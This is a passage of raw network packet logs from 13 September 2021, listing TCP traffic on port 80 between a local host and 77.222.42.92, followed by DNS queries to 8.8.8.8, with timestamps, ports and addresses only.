Sep 13, 2021 15:55:33.884828091 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884838104 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884843111 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884869099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884881020 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884893894 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884917021 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884924889 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884944916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884960890 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884968996 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884993076 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884999990 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885026932 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885027885 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885051012 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885055065 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885072947 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885092020 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885104895 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885127068 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885128975 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885159969 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885169983 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885194063 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885204077 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885222912 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885237932 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885262012 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885270119 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885288954 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885310888 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885313034 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885348082 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885348082 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885375977 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885394096 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885397911 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885420084 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885430098 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885442972 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885457039 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885463953 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885488033 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885497093 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885519981 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885529995 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885541916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885565042 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885565996 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885591984 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885600090 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885622978 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885638952 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885668039 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885675907 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885695934 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885705948 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885725975 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885730028 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885755062 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885777950 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885778904 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885798931 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885818005 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885821104 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885853052 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885857105 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885878086 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885901928 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885905981 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885931015 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885938883 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885953903 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.885972977 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.885982990 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886008978 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886023045 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886030912 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886053085 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886070013 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886075974 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886102915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886104107 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886126995 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886132956 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886148930 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886172056 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886173010 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886194944 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886209965 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886214972 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886239052 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886241913 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886266947 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886281967 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886296034 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886317015 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886320114 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886342049 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886363029 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886363983 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886388063 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886413097 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886419058 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886445045 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886466980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886468887 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886493921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886497021 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886526108 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886527061 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886548042 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886569023 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886570930 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886601925 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886607885 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886627913 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886636019 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886651039 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886672974 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886672974 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886699915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886701107 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886724949 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886727095 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886746883 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886770010 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886776924 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886816978 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886863947 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886888027 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886909008 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886921883 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886934996 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886953115 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.886960030 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886989117 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.886998892 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887020111 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887037039 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887073994 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887254953 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887290955 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887314081 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887316942 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887341976 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887345076 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887372017 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887394905 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887398958 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887418032 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887445927 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887447119 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887470961 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887492895 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887492895 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887521982 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887533903 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887561083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887586117 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887609005 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887636900 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887643099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887667894 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887680054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887689114 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887708902 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887711048 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887732983 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887749910 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887759924 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887774944 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887784004 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887809992 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887814999 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887834072 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887842894 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887856007 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887876987 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887885094 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887898922 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887921095 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887940884 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887947083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887970924 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.887986898 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.887993097 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888012886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888015985 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888036966 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888052940 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888057947 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888079882 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888098001 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888125896 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888125896 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888132095 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888134956 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888153076 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888160944 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888175011 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888191938 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888195992 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888219118 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888225079 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888240099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888267040 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888269901 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888289928 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888310909 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888312101 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888328075 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888334036 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888355970 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888360023 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888376951 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888381004 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888398886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.888406038 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888422012 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888444901 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.888705969 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.914726019 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.982786894 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.982919931 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.060127020 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.060158014 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.060379982 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.137684107 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.137706995 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.137721062 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.137862921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.140429974 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.212357998 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.212397099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.212419033 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.212439060 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.212476969 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.214947939 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.214977980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.215023041 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.215061903 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.287396908 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.287425041 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.287436962 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:34.287539959 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:34.287671089 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.510276079 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.585670948 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.595369101 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.595527887 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.610235929 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.610399961 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.687093973 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687254906 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.687515974 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687531948 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687555075 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687568903 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687581062 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.687647104 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.687721014 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.761847973 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.761934042 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.761955976 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.761956930 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762008905 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.762026072 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762083054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762121916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.762228012 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762274027 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.762293100 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.762341022 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762411118 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.762943983 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.763087034 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.763446093 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.763534069 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:35.837101936 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837131023 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837138891 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837152958 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837272882 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837286949 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837573051 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.837778091 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.838294983 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.838649988 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.839262009 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.839385986 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.839732885 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.839848995 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.879106045 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:35.879200935 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:38.101465940 CEST	49759	80	192.168.2.4	77.222.42.92

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 15:55:22.849518061 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:22.897259951 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:26.109194040 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:26.182873011 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:55.131247044 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:55.158786058 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:57.725711107 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:57.776540995 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:15.637339115 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:15.704817057 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.180253983 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.215646029 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.565119028 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.603338957 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.658411980 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.725878954 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:17.038184881 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:17.072016001 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:17.598453045 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:17.634579897 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:18.121629000 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:18.156465054 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:18.649760008 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:18.683605909 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:19.443746090 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:19.468364954 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:21.493029118 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:21.525521994 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:22.466659069 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:22.499613047 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:32.424149036 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:32.449455976 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:32.466336966 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:32.481807947 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:36.676203966 CEST	61721	53	192.168.2.4	8.8.8.8
